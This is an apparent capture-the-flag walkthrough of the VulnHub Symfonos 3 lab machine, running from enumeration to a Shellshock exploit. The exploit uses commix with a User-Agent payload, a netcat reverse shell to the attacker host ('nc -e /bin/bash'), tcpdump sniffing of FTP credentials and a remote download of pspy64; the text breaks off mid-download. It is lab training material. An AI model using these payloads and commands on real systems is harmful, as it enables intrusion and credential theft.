Symfonos 3 || VulnHub Walkthrough

Hello, everyone! Welcome back to our VulnHub Walkthrough series. In today’s video, we’ll continue exploring the exciting VulnHub collection with "SymfonOS." Specifically, we’re diving into the 3rd virtual machine in the series, " SymfonOS 3 ." This intermediate, OSCP-like, real-world scenario machine is designed to highlight the importance of understanding vulnerabilities and how to exploit them effectively. Let’s get started!

To begin, head over to the VulnHub website and download the machine's image file. If you're new to VulnHub, check out our playlist for helpful guides on how to use the platform. 

Vulhub: Vulnerable By Design

Vulhub provides a collection of pre-built vulnerable environments. This resource is designed to help you practice penetration testing and vulnerability assessment skills on a variety of systems.

Now, let’s get started with exploiting this machine!


Setting Up

After downloading the image, extract the 7Z archive to access the virtual machine files. 

Inside, you’ll find several essential files, including the VMDK file. Now, we are creating a new virtual machine. 

In VirtualBox, click " New " to create a new VM. 

Specify the Name and Operating System

  • Name it " SymfonOS 3 ," 
  • set the OS type to Linux, and 
  • choose " Other Linux 64-bit " for the version since the specific distribution is unknown.

Now, allocate the desired amount of RAM. 

Next, select " Use an existing virtual hard disk file " and locate the VMDK file.

Now, click on "Finish" to complete the setup. Once it's finished, you'll see the " SymfonOS 3 " vulnerable machine in the VirtualBox manager. Let me regroup it into the VulnHub group for better organization.

To ensure that your  Kali Linux machine (used for attacks) and the vulnerable machine are connected to the same network, we have to make sure they're both connected via a host-only Adapter.

So, go to “ settings ” and change the Network adapter to " Host-Only ." 

Since everything is ready, let’s attempt to start the VM to check if it works.

Once it's ready, you should see a login prompt, indicating that everything is set up and we can begin our exploration! Let's dive into the fun!


Enumeration


Identify the IP address

The first step in our attack is enumeration, where we identify the IP address of our target machine using the  netdiscover  tool. This step helps map the network and locate devices that are up and accessible.

To execute this, open a terminal and enter:  netdiscover –i,  <specify the network interface name>

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1

From these results, we can see several IP addresses along with their corresponding MAC addresses. 

 Currently scanning: 192.168.106.0/16   |   Screen View: Unique Hosts                                                                                    
                                                                                                                                                         
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                         
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.103.1   0a:00:27:00:00:14      1      60  Unknown vendor                                                                                        
 192.168.103.2   08:00:27:56:1d:82      1      60  PCS Systemtechnik GmbH                                                                                
 192.168.103.15  08:00:27:a7:d3:05      1      60  PCS Systemtechnik GmbH   

Our target machine’s IP address is identified as “ 192.168.103.15” .


Conduct Network Scan

Next, we'll conduct a network scan to identify open ports on the target, which is an essential step in the enumeration process. Identifying open ports gives us insight into the network’s attack surface, allowing us to pinpoint specific services that might be vulnerable to exploitation. To perform this scan, we’ll use the widely used network scanning tool, Nmap.

In the terminal, run:  nmap -sC –sV <specify the target IP address>

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.103.15

In this command:

  • -sC  initiates a script scan using Nmap's default scripts, which probe for additional details about each service and identify possible vulnerabilities.
  • -sV enables version detection, allowing Nmap to determine the version of services running on open ports.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 22:23 EST
Nmap scan report for 192.168.103.15
Host is up (0.0012s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5b
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:64:72:76:80:51:7b:a8:c7:fd:b2:66:fa:b6:98:0c (RSA)
|   256 74:e5:9a:5a:4c:16:90:ca:d8:f7:c7:78:e7:5a:86:81 (ECDSA)
|_  256 3c:e4:0b:b9:db:bf:01:8a:b7:9c:42:bc:cb:1e:41:6b (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.25 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.72 seconds
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

Once the scan is completed, the results reveal three open ports with their respective services:

  1. Port 21 (TCP):  Running FTP (File Transfer Protocol), with the server identified as ProFTPD 1.3.5b.
  2. Port 22 (TCP): Running SSH (Secure Shell), which provides remote access if valid credentials are available. Although SSH is generally secure, weak or default passwords could make it exploitable.
  3. Port 80 (TCP): Running HTTP on a web server. The scan shows a basic website with no title, hosted on Apache HTTPD. This service is a common entry point for attacks and may contain web-based vulnerabilities.

These open ports present potential entry points into the target system. The next step is to conduct a deeper enumeration of each service to uncover vulnerabilities or clues that could facilitate initial or shell access. This focused analysis will guide us in developing a strategic approach to compromise the target.


Web Enumeration and Directory Busting

Our next steps involve investigating potential vulnerabilities to identify opportunities for shell access or other footholds on the target system. 

Since the  HTTP web server  is running on Port 80, we’ll begin by examining it, as web services often serve as primary access points and may reveal additional attack vectors.

80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.25 (Debian)

To start, access the web service by entering the target’s IP address directly into a web browser. 

The page loads with visual content depicting a scene from Greek mythology, likely centered around the figure of Cerberus . The central figure is a monstrous three-headed dog, commonly associated with guarding the underworld. Its three heads have menacing expressions and fiery eyes. 

A shadowy figure, likely Hades , the god of the underworld, stands beside Cerberus, holding what appears to be a spear or staff.

To uncover hidden clues, inspect the page source. 

Within the source code, we discover a hint:

“Can you bust the underworld?”

This clue suggests the potential presence of a hidden file or directory, prompting further exploration.


Directory Enumeration of the Base URL

Let now Perform Directory Enumeration. To locate hidden resources, we’ll use directory enumeration tools such as dirb or Gobuster

These tools will systematically probe for common directories and file names, which could uncover additional files or directories that are not directly visible from the website. This process will help us identify possible attack vectors or sensitive information that can aid in further exploitation.

Using dirb, we will start scanning the base URL. 

┌──(kali㉿kali)-[~]
└─$ dirb http://192.168.103.15/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Nov 25 22:26:26 2024
URL_BASE: http://192.168.103.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.103.15/ ----
+ http://192.168.103.15/cgi-bin/ (CODE:403|SIZE:279)                                                                                                     
==> DIRECTORY: http://192.168.103.15/gate/                                                                                                               
+ http://192.168.103.15/index.html (CODE:200|SIZE:241)                                                                                                   
+ http://192.168.103.15/server-status (CODE:403|SIZE:279)                                                                                                
                                                                                                                                                         
---- Entering directory: http://192.168.103.15/gate/ ----
+ http://192.168.103.15/gate/index.html (CODE:200|SIZE:202)                                                                                              
                                                                                                                                                         
-----------------
END_TIME: Mon Nov 25 22:26:33 2024
DOWNLOADED: 9224 - FOUND: 4
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$

The results reveal:

  • /cgi-bin/ (403 Forbidden ): Suggests a directory exists but requires further probing.
  • /gate/  (Accessible): Indicates a subdirectory worth investigating.
  • /index.html (200 OK): The main page.
  • /server-status (403 Forbidden): Suggests server monitoring data is restricted.

The accessible /gate/ directory stands out as a point of interest. 


/gate/  Directory Enumeration

Navigating /gate/ directory in the browser reveals content that closely resembles the main page.

The imagery evokes a sense of an underworld setting, characterized by a dark and ominous atmosphere. A fiery glow illuminates the scene, enhancing the eerie vibe, while ruined structures in the background contribute to the impression of desolation and mystery. 

This thematic presentation aligns with the mythology-inspired elements seen on the main page, suggesting that this directory may contain additional clues or serve a specific purpose in the context of the target system.

We will Perform another directory-busting scan, this time targeting the /gate/ directory and also we switch to a more comprehensive wordlist to expand the search.

But it looks like, dirb is not able to enumerate directories, so we will use gobuster for this purpose.

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.103.15/gate/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.103.15/gate/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cerberus             (Status: 301) [Size: 324] [--> http://192.168.103.15/gate/cerberus/]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$

This extended scan uncovers:

The discovery of the /cerberus/ directory is significant. It suggests another layer of content or functionality, potentially exposing vulnerabilities or providing further clues for exploitation.


/cerberus/  Directory Enumeration

Next, we’ll explore the /cerberus/ directory to analyze its contents and continue our enumeration process.

Upon loading the page, we see an image depicted on the webpage:

The image looks like a three-headed dog, likely Cerberus from Greek mythology, depicted in a fiery and menacing setting. 

This visual, however, does not provide any immediate hints. 

Reviewing the page source also reveals no additional clues, prompting us to extend our search.

┌──(kali㉿kali)-[~]
└─$ dirb http://192.168.103.15/gate/cerberus/                                                               

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Nov 25 22:34:36 2024
URL_BASE: http://192.168.103.15/gate/cerberus/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.103.15/gate/cerberus/ ----
+ http://192.168.103.15/gate/cerberus/index.html (CODE:200|SIZE:202)                                                                                     
==> DIRECTORY: http://192.168.103.15/gate/cerberus/tartarus/                                                                                                                                                                                                                                                  

Using dirb to enumerate the  /gate/cerberus/  directory yields:

  • index.html : This file loads successfully but does not appear to hold significant information.
  • tartarus/ : A new directory  was discovered, indicating deeper directory nesting.
---- Entering directory: http://192.168.103.15/gate/cerberus/tartarus/ ----
+ http://192.168.103.15/gate/cerberus/tartarus/index.html (CODE:200|SIZE:273)                                                                            
+ http://192.168.103.15/gate/cerberus/tartarus/research (CODE:200|SIZE:6825)                                                                             
                                                                                                                                                         
-----------------
END_TIME: Mon Nov 25 22:34:43 2024
DOWNLOADED: 9224 - FOUND: 3
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

Also dirb automatically successfully enumerates the directory of tartarus which reveals:

  • index.html : which indicates the home page of tartarus. 
  • research: which looks like a large file of size 6,825 bytes which may potentially contain sensitive information or clues.

This structure indicates an organized directory system designed to conceal information. The research file is particularly noteworthy and warrants closer examination for actionable insights.


Enumerate /research directory

It’s time to retrieve and analyze the research file. Use tools like curl , wget , or direct browser access to download the file. 

Upon inspecting its content, we find extensive information about research on gods and demons

While this content may hold potential clues or sensitive data, its sheer volume makes manual analysis impractical. It might be useful for generating a custom wordlist for further enumeration, but we cannot proceed directly with it for now.

Instead, the discovery of the /tartarus/ directory is a significant breakthrough. 

This new directory suggests an additional layer of content or functionality that could provide actionable insights or lead to further vulnerabilities. 


Enumerate /gate/tartarus directory

Let’s focus our attention on exploring /tartarus/ to determine its potential.

Navigating this directory presents a dramatic and chaotic visual scene set in a dark, cavernous underworld. 

This imagery aligns with Tartarus from Greek mythology—an abyss used as a prison for the wicked and the Titans, symbolizing torment and eternal darkness. It's a place of eternal darkness and punishment, located far below Hades. 

Let now inspect the page source for /tartarus/ .

Inspecting the page source for /tartarus/ reveals a new hint:

The underworld can be cruel… but it can also be misleading.

This suggests that our approach to the enumeration process might be flawed, or we may be overlooking something critical. It indicates that we may have been enumerating directories incorrectly and need to adjust our strategy.

Previously, we discovered a /cgi-bin/ directory, which could potentially reveal exploitable configurations. 

---- Scanning URL: http://192.168.103.15/ ----
+ http://192.168.103.15/cgi-bin/ (CODE:403|SIZE:279) 

 

Enumerate /cgi-bin directory

The /cgi-bin/ directory is a standard location for Common Gateway Interface (CGI) scripts, commonly used to execute server-side code.

Upon visiting it, we encountered a " permission denied " message. 

However, directories like /cgi-bin/ or /server-status often contain valuable information such as server configurations, running processes, or debugging data. These can be leveraged by attackers to exploit vulnerabilities.

To further investigate, we’ll perform directory busting again to locate any accessible resources. 

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.103.15/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.103.15/cgi-bin/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/underworld           (Status: 200) [Size: 63]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

This time, the search reveals a new directory: /underworld , which returns a 200 OK response, indicating it is accessible.


Enumerate /cgi-bin/underworld directory

Upon accessing underworld , we’re presented with information about the system’s uptime and load averages. 

This indicates that the script in this directory outputs server status, which could provide useful details for further reconnaissance. 

Given this, we need to analyze the potential risks.


Analyze Potential Risks

The underworld directory is highly suspicious and warrants a closer inspection. CGI scripts in directories like these are often vulnerable to various exploits, including:

  • Arbitrary code execution
  • Path traversal attacks
  • Shellshock vulnerability

Based on the information gathered, the Shellshock vulnerability is likely a potential risk. This vulnerability allows attackers to execute arbitrary code on the server, making it a critical point for further exploitation.

To investigate further, we'll proceed by testing the target for vulnerabilities, specifically related to OS command injection. This may include testing for Shellshock , which could potentially provide a foothold on the target system.


Foothold


Exploiting Shellshock vulnerability

We'll use the Commix (short for COMMand Injection eXploitation) tool to test the target for  Shellshock  and command injection vulnerabilities. 

This tool automates the detection and exploitation of command injection flaws, making it a valuable resource for identifying potential vulnerabilities that could grant initial access to the system.

We run Commix with the target URL using commix -u <specify the target>

┌──(kali㉿kali)-[~]
└─$ commix -u http://192.168.103.15/cgi-bin/underworld
                                      __
   ___   ___     ___ ___     ___ ___ /\_\   __  _
 /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v3.9-stable
/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </
\ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\ https://commixproject.com
 \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ (@commixproject)

+--
Automated All-in-One OS Command Injection Exploitation Tool
Copyright © 2014-2024 Anastasios Stasinopoulos (@ancst)
+--

(!) Legal disclaimer: Usage of commix for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

[22:41:48] [info] Testing connection to the target URL. 
[22:41:48] [info] Heuristic (basic) tests shows that target URL might contain a script vulnerable to shellshock. 
Do you want to enable the shellshock module ('--shellshock')? [Y/n] > 

The Commix will analyze the target and determine whether the script is potentially vulnerable. During the scan, Commix will prompt us to enable the Shellshock module When asked, type  y  to enable it and initiate heuristic tests for the Shellshock vulnerability.

Do you want to enable the shellshock module ('--shellshock')? [Y/n] > y
[22:42:00] [info] Performing identification checks to the target URL.
[22:42:00] [warning] The HTTP Cookie header is not provided, so this test is going to be skipped.
[22:42:00] [info] Testing the shellshock injection technique.           
[22:42:00] [info] User-Agent HTTP Header appears to be injectable via shellshock injection technique.
           |_ () { :; }; echo CVE-2014-6271:Done;
 is vulnerable. Do you want to prompt for a pseudo-terminal shell? [Y/n] >

The Commix tests for command injection through the User-Agent HTTP header . In this case, we discover that the User-Agent header is injectable, confirming that the Shellshock vulnerability can be exploited using this header.

Once the Shellshock vulnerability is successfully exploited, the tool will confirm the script’s susceptibility. It will then prompt for a pseudo-terminal shell. Type  Y  to continue, which will allow Commix to initiate an  OS shell  on the target system.

Do you want to prompt for a pseudo-terminal shell? [Y/n] > Y
Pseudo-Terminal Shell (type '?' for available options)

[22:42:39] [warning] You are into the 'os_shell' mode.                                                                                                    
commix(os_shell) > 

At this point, a pseudo-terminal shell is opened, granting us direct interaction with the target system. We now have a command shell through which we can execute additional commands and explore the system for vulnerabilities or sensitive information.

To check the available commands in the shell, use the ? command, which will list the options available. 

commix(os_shell) >                                                                                                                                     
Available 'os_shell' options:                                                                                                                             
 * Type '?' to get all the available options.                                                                                                             
 * Type 'back' to move back from the current context.                                                                                                     
 * Type 'quit' / 'exit' (or use <Ctrl-C>) to quit commix.                                                                                                 
 * Type 'reverse_tcp' to get a reverse TCP connection.                                                                                                    
 * Type 'bind_tcp' to set a bind TCP connection.                                                                                                          
commix(os_shell) > 

With this pseudo-terminal , we will now establish a reverse shell to connect from the target system back to the attacker's machine using Netcat .


Gain Reverse Shell

Before we execute the reverse shell, we need to set up a listener on our attacking machine. This can done using Netcat , which will listen for the incoming connection from the target system. 

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...

Once the listener is ready, we can execute the crafted reverse shell command.

nc -e '/bin/bash' <Listening IP address> <Listening Port>

Here, 

  • <Listening IP address> : Specify the listening host IP address, which is our Attacking machine IP address. If you do not know, then use the  ifconfig command.
  • <Listening Port> : Specify the Port where it listening to after execution.

Now, execute the crafted command in pseudo-terminal .

commix(os_shell) > nc -e '/bin/bash' 192.168.103.3 4444     

Upon successful execution, a reverse shell will be established, connecting the target system to our attacking machine and providing us with interactive access.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.103.3] from (UNKNOWN) [192.168.103.15] 52390

For better usability and control over the shell, we need to upgrade it. 


Upgrade the Reverse Shell

First, we will check if Python is available by running the command: which python

which python
/usr/bin/python

Since Python is present, we will use it to spawn a more stable shell by running the command: 

python -c "import pty; pty.spawn('/bin/bash')"

python -c "import pty;pty.spawn('/bin/bash')"
cerberus@symfonos3:/usr/lib/cgi-bin$

This command will give us a fully interactive shell. Additionally, we set the terminal type with:

export TERM=xterm

cerberus@symfonos3:/usr/lib/cgi-bin$ export TERM=xterm
export TERM=xterm
cerberus@symfonos3:/usr/lib/cgi-bin$

This helps ensure smoother interaction with the remote shell, improving the post-exploitation workflow and allowing us to interact with the target system more effectively.

Since we now have user access, let's check if there are any flags present. 


Access the user flag

We start by using the cd command to navigate to the Cerberus home directory

cerberus@symfonos3:/usr/lib/cgi-bin$ cd
cd
bash: cd: HOME not set
cerberus@symfonos3:/usr/lib/cgi-bin$ 

However, it appears that the default directory is not set, so we will change the directory manually.

First, we navigate to the /home directory and list the files and directories. 

cerberus@symfonos3:/usr/lib/cgi-bin$ cd /home
cd /home
cerberus@symfonos3:/home$ ls -al
ls -al
total 16
drwxr-xr-x  4 root     root     4096 Jul 20  2019 .
drwxr-xr-x 22 root     root     4096 Jul 19  2019 ..
drwxr-xr-x  2 cerberus cerberus 4096 Jul 20  2019 cerberus
drwxr-xr-x  3 hades    hades    4096 Apr  6  2020 hades
cerberus@symfonos3:/home$

Here, we find two directories: Cerberus and hades These appear to be the home directories of the users on the system.

Next, we change the directory to Cerberus and inspect the files and directories. 

cerberus@symfonos3:/home$ cd cerberus
cd cerberus
cerberus@symfonos3:/home/cerberus$ ls -al
ls -al
total 20
drwxr-xr-x 2 cerberus cerberus 4096 Jul 20  2019 .
drwxr-xr-x 4 root     root     4096 Jul 20  2019 ..
lrwxrwxrwx 1 root     root        9 Jul 20  2019 .bash_history -> /dev/null
-rw-r--r-- 1 cerberus cerberus  220 Jul 20  2019 .bash_logout
-rw-r--r-- 1 cerberus cerberus 3526 Jul 20  2019 .bashrc
-rw-r--r-- 1 cerberus cerberus  675 Jul 20  2019 .profile
cerberus@symfonos3:/home/cerberus$ 

Inside, we find the usual default user configuration files, such as .bashrc and .profile , as well as a .bash_history file, which is linked to /dev/null (indicating that history logging is disabled). However, we do not find any flags here.

This suggests that there may be a flag in the Hades user's home directory. To access this, we need to escalate privileges to the Hades user. We will need to enumerate the system further to find a way to escalate our privileges and gain access to the Hades user account.


Privilege Escalation


Escalate the user to Hades 

In the privilege escalation process, the primary objective is to gather system information and identify any vulnerabilities or misconfigurations that could grant elevated privileges, potentially leading to root access. However, since we currently have limited user access through the reverse shell, we cannot access certain files or commands necessary for a comprehensive assessment.

Earlier, we noticed that we don’t have the necessary permissions to perform a full user privilege enumeration.

To move forward, we run the sudo -l command to check if the cerberus user has any sudo privileges. 

cerberus@symfonos3:/home/cerberus$ sudo -l
sudo -l                                                                                                                                                   
bash: sudo: command not found                                                                                                                             
cerberus@symfonos3:/home/cerberus$ 

The command returns a " sudo: command not found " error, indicating that the cerberus user does not have sudo access. 

To gather more details, we run the id command, which provides the user's UID, GID, and group memberships.

cerberus@symfonos3:/home/cerberus$ id                                                                                                                     
id                                                                                                                                                        
uid=1001(cerberus) gid=1001(cerberus) groups=1001(cerberus),33(www-data),1003(pcap)                                                                       
cerberus@symfonos3:/home/cerberus$

The id command reveals the user's UID, GID, and group memberships.

In this case, the cerberus user is a member of the www-data and pcap groups. 

  • The www-data group is commonly used by web services, 
  • while  pcap indicates permission to access packet capture.
 Tools like tcpdump could be useful for further privilege escalation.


Investigating the pcap Group for Network Capture Opportunities

To verify if tcpdump is available, we use the command:  which tcpdump

cerberus@symfonos3:/home/cerberus$ which tcpdump                                                                                                          
which tcpdump                                                                                                                                             
/usr/local/bin/tcpdump                                                                                                                                    
cerberus@symfonos3:/home/cerberus$ 

Upon execution, it confirms that the tcpdump binary is located in /usr/local/bin/. This means we can use tcpdump to capture network traffic on available interfaces.

Next, we check the available network interfaces by running tcpdump -D

cerberus@symfonos3:/home/cerberus$ tcpdump -D                                                                                                             
tcpdump -D                                                                                                                                                
1.enp0s3 [Up, Running]                                                                                                                                    
2.any (Pseudo-device that captures on all interfaces) [Up, Running]                                                                                       
3.lo [Up, Running, Loopback]                                                                                                                              
4.nflog (Linux netfilter log (NFLOG) interface)                                                                                                           
5.nfqueue (Linux netfilter queue (NFQUEUE) interface)                                                                                                     
6.usbmon1 (USB bus number 1)                                                                                                                              
7.usbmon2 (USB bus number 2)                                                                                                                              
cerberus@symfonos3:/home/cerberus$

The available interfaces are:

  • enp0s3 (primary network interface) ,
  • any ( captures traffic from all interfaces) ,
  • lo ( loopback interface) .

We proceed by using tcpdump to capture network traffic from all interfaces. 

cerberus@symfonos3:/home/cerberus$ tcpdump -i any -w capture.pcap &

Where,

  • The -i option specifies the interface name, and 
  • the -w option is used to specify the file where the captured data will be stored.
  • We append the & symbol to run the command in the background.

tcpdump -i any -w capture.pcap &                                                                                                                          
[1] 1329                                                                                                                                                  
tcpdump: listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes                               
                                                     
cerberus@symfonos3:/home/cerberus$ 

The command starts capturing traffic and writing it to the capture.pcap file.

cerberus@symfonos3:/home/cerberus$ ls -al                                                                                                                 
ls -al                                                                                                                                                    
total 20                                                                                                                                                  
drwxr-xr-x 2 cerberus cerberus 4096 Nov 25 21:52 .                                                                                                        
drwxr-xr-x 4 root     root     4096 Jul 20  2019 ..                                                                                                       
lrwxrwxrwx 1 root     root        9 Jul 20  2019 .bash_history -> /dev/null                                                                               
-rw-r--r-- 1 cerberus cerberus  220 Jul 20  2019 .bash_logout                                                                                             
-rw-r--r-- 1 cerberus cerberus 3526 Jul 20  2019 .bashrc                                                                                                  
-rw-r--r-- 1 cerberus cerberus  675 Jul 20  2019 .profile                                                                                                 
-rw-r--r-- 1 cerberus cerberus    0 Nov 25 21:52 capture.pcap                                                                                             
cerberus@symfonos3:/home/cerberus$ 

Once the traffic is captured in capture.pcap, we need to transfer the file to our machine for analysis. 


Analyzing the Captured PCAP File

This can be done using tools like Wireshark for detailed graphical traffic analysis or tshark , a command-line tool for quicker queries.


Serve capture.pcap

To serve the capture.pcap file, we use Python’s built-in HTTP server

1. First, we have to check the Python version on the target machine. 

cerberus@symfonos3:/home/cerberus$ python --version                                                                                                       
python --version                                                                                                                                          
Python 2.7.13                                                                                                                                             
cerberus@symfonos3:/home/cerberus$

2. Since the target is running Python 2 , we use the command: python -m SimpleHTTPServer

cerberus@symfonos3:/home/cerberus$ python -m SimpleHTTPServer                                                                                             
python -m SimpleHTTPServer                                                                                                                                
Serving HTTP on 0.0.0.0 port 8000 ... 

The Python HTTP server is now running on the target machine, serving the  capture.pcap  file 

3. Now, we can use wget to download the file to our local machine.

┌──(kali㉿kali)-[~]
└─$ wget http://192.168.103.15:8000/capture.pcap
--2024-11-25 22:57:01--  http://192.168.103.15:8000/capture.pcap
Connecting to 192.168.103.15:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/vnd.tcpdump.pcap]
Saving to: ‘capture.pcap’

capture.pcap                           100%[==========================================================================>]  20.00K  --.-KB/s    in 0s      

2024-11-25 22:57:01 (526 MB/s) - ‘capture.pcap’ saved [20480/20480]

                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

The file is now successfully transferred using wget on the attacker's machine.

Next, we analyze the PCAP file for Credentials in plaintext (e.g., HTTP, FTP, etc.), Connections to unusual hosts , and  Traffic anomalies (such as suspicious protocols or high-volume transfers).


Analyze the PCAP file using A-Packets

For this analysis, we won’t use Wireshark or tshark. Instead, we’ll upload the file to A-Packets, an online tool, which will automatically filter and highlight key findings.

To upload the captured PCAP file, click on "Upload PCAP file," which will redirect to an area where you can either drag and drop the PCAP file or upload it from your local device.

Upon upload, we need to accept the terms of service to continue. After a successful upload, the tool will generate a detailed report. 

Click on " View Report ."

In the found credentials section, it shows 1 in red, which indicates that a credential is present. 

Yes, this appears to be a credential used to connect back to the FTP server.

Now that we have a credential, it will help us access the user hades and escalate further. We can initiate the su command to switch to the substitute user. 

However, when I stopped the previously used Python HTTP server, it disconnected the connection.

This username works for FTP, as found from analysis, but if we try it on SSH to establish a connection, as,  SSH proves to be more stable.


Establish a connection using SSH

┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
The authenticity of host '192.168.103.15 (192.168.103.15)' can't be established.
ED25519 key fingerprint is SHA256:W2RvYQCoyTPbHNSQycwjo7k7ccOJvfWbk4WpSDnK4Dk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.103.15' (ED25519) to the list of known hosts.
[email protected]'s password: 
Linux symfonos3 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Mon Apr  6 14:06:02 2020 from 192.168.50.128
hades@symfonos3:~$

Upon trying with the credential, I successfully connect via SSH


Access the user flag

Now that we are logged in as hades, we check for any flags in this user's directory. 

hades@symfonos3:~$ ls -al
total 28
drwxr-xr-x 3 hades hades 4096 Apr  6  2020 .
drwxr-xr-x 4 root  root  4096 Jul 20  2019 ..
lrwxrwxrwx 1 root  root     9 Jul 20  2019 .bash_history -> /dev/null
-rw-r--r-- 1 hades hades  220 Jul 19  2019 .bash_logout
-rw-r--r-- 1 hades hades 3526 Jul 19  2019 .bashrc
drwxr-xr-x 2 hades hades 4096 Jul 20  2019 .nano
-rw-r--r-- 1 hades hades  675 Jul 19  2019 .profile
-rw-r--r-- 1 hades hades  165 Apr  6  2020 .wget-hsts
hades@symfonos3:~$ 

However, there is no flag in this directory. It seems the flag is only accessible at the root level, but we currently lack the necessary permissions to access the root directory.


Escalate to Root

Our objective is to escalate privileges to root by identifying system vulnerabilities or misconfigurations that may allow us to gain root shell access. However, I believe we still do not have sufficient user privileges, which restricts our ability to access certain files and commands for a full assessment.

To explore potential avenues for escalating to root, we first check for sudo privileges. 

hades@symfonos3:~$ sudo -l
-bash: sudo: command not found                                                                                                                            
hades@symfonos3:~$ 

Running the sudo -l  command fails because sudo is not available on the system, indicating that we cannot escalate via sudo.


Enumerate System information

Next, we need to enumerate the user’s access. We use the id command to display the user and group identity of the Hades user. This command will reveal useful information about the user’s UID, GID, and the secondary groups they belong to.

hades@symfonos3:~$ id                                                                                                                                     
uid=1000(hades) gid=1000(hades) groups=1000(hades),1002(gods)                                                                                             
hades@symfonos3:~$ 

From the output of the id command, we gather the following information:

  • uid=1000(hades) : The primary user ID for the hades user is 1000. This UID determines the user’s identity when executing processes or accessing resources.
  • gid=1000(hades) : The primary group ID for the hades user is also 1000, indicating ownership of resources tied to the hades group.
  • groups=1000(hades),1002(gods) : The hades user is a member of the gods group (ID 1002). This provides additional permissions:
    • Access to files or processes owned by the gods group.
    • Potential influence from cron jobs or processes initiated by members of the gods group.

This confirms the user's primary and supplementary group memberships. 


Examining CRON Jobs and Process Monitoring

To investigate the gods group’s influence on running processes, particularly cron jobs, we use the pspy64 tool.

pspy64 is a lightweight tool designed to monitor processes executed on a system without requiring root permissions. It helps identify scheduled tasks, group-level activities, and commands executed by various users or groups.


Steps to Deploy and Run pspy64

1. First, Download pspy64 from GitHub onto the attacker’s machine.

pspy64 - Process Monitoring Tool

Download pspy64, a tool for monitoring processes without root permissions. This utility is essential for analyzing and understanding process behaviors on Linux systems.

2. Once downloaded, we need to transfer the Tool to the Target system. So, we have to set up an HTTP server using Python.

┌──(kali㉿kali)-[~/Downloads]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

3. On the target machine, use wget to download the tool. 

hades@symfonos3:~$ cd /tmp                                                                                                                                
hades@symfonos3:/tmp$ wget http://192.168.103.3:8000/pspy64                                                                                               
--2024-11-25 22:03:57--  http://192.168.103.3:8000/pspy64                                                                                                 
